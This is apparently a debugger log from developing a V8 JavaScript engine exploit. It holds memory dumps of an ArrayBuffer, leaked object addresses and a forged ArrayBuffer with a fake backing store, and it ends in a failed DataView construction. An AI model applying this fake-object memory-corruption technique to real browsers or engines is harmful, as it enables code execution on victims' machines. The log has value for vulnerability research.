gef➤  c
Continuing.
[object ArrayBuffer]
DebugPrint: 0x2790818d: [JSArrayBuffer]
 - map = 0x474865c9 [FastProperties]
 - prototype = 0x4b28f2d1
 - elements = 0x5cc04125 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
 - internal fields: 2
 - backing_store = 0x565f07a0
 - byte_length = 12
 - properties = {
 }
 - internal fields = {
    0
    0
 }
0x474865c9: [Map]
 - type: JS_ARRAY_BUFFER_TYPE
 - instance size: 32
 - inobject properties: 0
 - elements kind: FAST_HOLEY_SMI_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0x5cc041a1 
 - instance descriptors (own) #0: 0x5cc0411d <FixedArray[0]>
 - prototype: 0x4b28f2d1 
 - constructor: 0x4b28f299 
 - code cache: 0x5cc04125 <FixedArray[0]>
 - dependent code: 0x5cc04125 <FixedArray[0]>
 - construction counter: 0

 

gef➤  x/32wx 0x2790818c
0x2790818c: 0x474865c9 0x5cc04125 0x5cc04125 0x00000018
0x2790819c: 0x565f07a0 0x00000004 0x00000000 0x00000000
0x279081ac: 0x474864c1 0x5cc04125 0x5cc04125 0x2790818d
0x279081bc: 0x00000000 0x00000018 0x00000000 0x00000000
0x279081cc: 0x48e84839 0x00000003 0x00000026 0x5cc42459
0x279081dc: 0x5cc4e669 0x48e84839 0x00000003 0x00000028
0x279081ec: 0x279081cd 0x5cc06995 0xdeadbeef 0xdeadbeef
0x279081fc: 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef
gef➤  x/32wx 0x474865c8
0x474865c8: 0x48e8412d 0x3d000008 0x000900c3 0x082003ff
0x474865d8: 0x4b28f2d1 0x4b28f299 0x00000000 0x5cc0411d
0x474865e8: 0x5cc04125 0x5cc04125 0x00000000 0x48e8412d
0x474865f8: 0x1a000407 0x031d00bc 0x082013ff 0x4b285171
0x47486608: 0x4b28518d 0x00000000 0x4b28f2ed 0x5cc04125
0x47486618: 0x5cc04125 0x00000000 0x48e8412d 0x1d00000a
0x47486628: 0x007100c4 0x082003ff 0x4b28f48d 0x4b28f455
0x47486638: 0x00000000 0x5cc0411d 0x5cc04125 0x5cc04125
gef➤  x/32wx 0x5cc04124
0x5cc04124: 0x48e84185 0x00000000 0x48e841b1 0x3043247e
0x5cc04134: 0x00000008 0x6c6c756e 0x48e841b1 0xae4b45da
0x5cc04144: 0x0000000c 0x656a626f 0xdead7463 0x48e84235
0x5cc04154: 0x00000000 0xbff00000 0x5cc0416d 0xfffffffe
0x5cc04164: 0x5cc04189 0x0000000c 0x48e841b1 0xe697d962
0x5cc04174: 0x0000001a 0x6e696e75 0x61697469 0x657a696c
0x5cc04184: 0xdeadbe64 0x48e841b1 0x21a3306e 0x00000012
0x5cc04194: 0x65646e75 0x656e6966 0xdeadbe64 0x48e84261
gef➤  x/32wx 0x48e84184
0x48e84184: 0x48e8412d 0x06000000 0x001800a9 0x002003ff
0x48e84194: 0x5cc04101 0x5cc04101 0x00000000 0x5cc0411d
0x48e841a4: 0x5cc04125 0x5cc04125 0x00000000 0x48e8412d
0x48e841b4: 0x00007700 0x00190004 0x082003ff 0x5cc04101
0x48e841c4: 0x5cc04101 0x00000000 0x5cc0411d 0x5cc04125
0x48e841d4: 0x5cc04125 0x00000000 0x48e8412d 0x14000001
0x48e841e4: 0x00190095 0x082003ff 0x5cc04101 0x5cc04101
0x48e841f4: 0x00000000 0x5cc0411d 0x5cc04125 0x5cc04125

 

root@ubuntu1804:~/hack/hack/docker/ubuntu1804/hack/v8/v8/out.gn/ia32.debug# ./d8 --allow_natives_syntax 1.js
[-] 22.ab2_map_obj_addr: 0x52cd5b21
[-] 3.fake_ab_float_addr: 0x52ce9441
debug
fp = 0xffffcc04, sp = 0xffffcbc8, caller_sp = 0xffffcc0c: #
0x52ce9441: [JSArrayBuffer]
 - map = 0x52cc1ee9 [FastProperties]
 - prototype = 0x3fb8f2d1
 - elements = 0x52cd5b21 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
 - internal fields: 2
 - backing_store = 0x12345678
 - byte_length = 8192
 - properties = {
 }
 - internal fields = {
    0
    0
 }

1.js:195: TypeError: First argument to DataView constructor must be an ArrayBuffer
fake_dv = new DataView(fake_arraybuffer,1,0x2000);
           ^
TypeError: First argument to DataView constructor must be an ArrayBuffer
    at new DataView ()
    at 1.js:195:12

 

 
